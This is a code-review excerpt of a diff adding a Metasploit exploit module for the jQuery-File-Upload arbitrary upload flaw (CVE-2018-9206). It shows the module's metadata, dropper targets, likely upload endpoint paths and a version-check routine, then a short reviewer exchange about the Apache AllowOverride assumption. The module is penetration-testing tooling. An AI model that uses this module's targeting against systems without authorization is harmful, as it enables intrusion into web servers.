modules/exploits/unix/webapp/jquery_file_upload.rb

```diff
@@ -0,0 +1,190 @@
+
+        Due to a default configuration in Apache 2.3.9+, the widget's .htaccess
+        file may be disabled, enabling exploitation of this vulnerability.
+
+        This vulnerability has been exploited in the wild since at least 2015
+        and was publicly disclosed to the vendor in 2018. It has been present
+        since the .htaccess change in Apache 2.3.9.
+
+        This module provides a generic exploit against the jQuery widget.
+      },
+      'Author'         => [
+        'Claudio Viviani',     # WordPress Work the Flow (Arbitrary) File Upload
+        'Larry W. Cashdollar', # (Re)discovery, vendor disclosure, and PoC
+        'wvu'                  # Metasploit module
+      ],
+      'References'     => [
+        ['CVE', '2018-9206'],
+        ['URL', 'http://www.vapidlabs.com/advisory.php?v=204'],
+        ['URL', 'https://github.com/blueimp/jQuery-File-Upload/pull/3514'],
+        ['URL', 'https://github.com/lcashdol/Exploits/tree/master/CVE-2018-9206'],
+        ['URL', 'https://www.homelab.it/index.php/2015/04/04/wordpress-work-the-flow-file-upload-vulnerability/'],
+        ['URL', 'https://github.com/rapid7/metasploit-framework/pull/5130'],
+        ['URL', 'https://httpd.apache.org/docs/current/mod/core.html#allowoverride']
+      ],
+      'DisclosureDate' => 'Oct 9 2018', # Larry's disclosure to the vendor
+      'License'        => MSF_LICENSE,
+      'Platform'       => ['php', 'linux'],
+      'Arch'           => [ARCH_PHP, ARCH_X86, ARCH_X64],
+      'Privileged'     => false,
+      'Targets'        => [
+        ['PHP Dropper',   'Platform' => 'php',   'Arch' => ARCH_PHP],
+        ['Linux Dropper', 'Platform' => 'linux', 'Arch' => [ARCH_X86, ARCH_X64]]
+      ],
+      'DefaultTarget'  => 0
+    ))
+
+    register_options([
+      OptString.new('TARGETURI', [true, 'Base path', '/jQuery-File-Upload'])
+    ])
+  end
+
+  def version_paths
+    %w[
+      /package.json
+      /bower.json
+    ].map { |u| normalize_uri(target_uri.path, u) }
+  end
+
+  # List from PoC sorted by frequency
+  def upload_paths
+    %w[
+      /server/php/index.php
+      /server/php/upload.class.php
+      /server/php/UploadHandler.php
+      /example/upload.php
+      /php/index.php
+    ].map { |u| normalize_uri(target_uri.path, u) }
+  end
+
+  def check
+    a = nil
+
+    version_paths.each do |u|
+      vprint_status("Checking #{u}")
+
+      res = send_request_cgi(
+        'method' => 'GET',
+        'uri'    => u
+      )
+
+      next unless res
+
+      unless a
+        res.headers['Server'] =~ /Apache\/([\d.]+)/ &&
+          $1 && (a = Gem::Version.new($1))
+
+        # We have to make some assumptions about configuration here
+        if a && a >= Gem::Version.new('2.3.9')
+          vprint_good("Found Apache #{a} (AllowOverride None)")
+        elsif a
+          vprint_error("Found Apache #{a} (AllowOverride All)")
+          return CheckCode::Safe
```

Comment:
This does not seem like a safe assumption given that administrators can re-enable `AllowOverride`.

Reply:
Agreed, hence the parens. Short of a way to detect it, you wanna just remove it? This check turned out to be supplemental in the end.